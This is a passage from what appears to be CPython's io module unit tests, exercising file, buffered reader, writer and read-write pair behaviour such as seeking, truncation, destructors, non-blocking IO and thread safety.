self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
self.assertEqual(f.seek(self.LARGE), self.LARGE)
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(TypeError, self.open, fn_with_NUL, 'w')
self.assertRaises(TypeError, self.open, bytes(fn_with_NUL, 'ascii'), 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test comsumes large resources; It takes
# a long time to build the >2GB file and takes >2GB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
if not support.is_resource_enabled("largefile"):
print("\nTesting large file ops skipped on %s." % sys.platform,
file=sys.stderr)
print("It requires %d bytes and a long time." % self.LARGE,
file=sys.stderr)
print("Use 'regrtest.py -u largefile test_io' to run it.",
file=sys.stderr)
return
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 1, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertTrue(f.tell() > 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def test_flush_error_on_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
def bad_flush():
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02) # yield
for t in threads:
t.join()
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
class CBufferedWriterTest(BufferedWriterTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
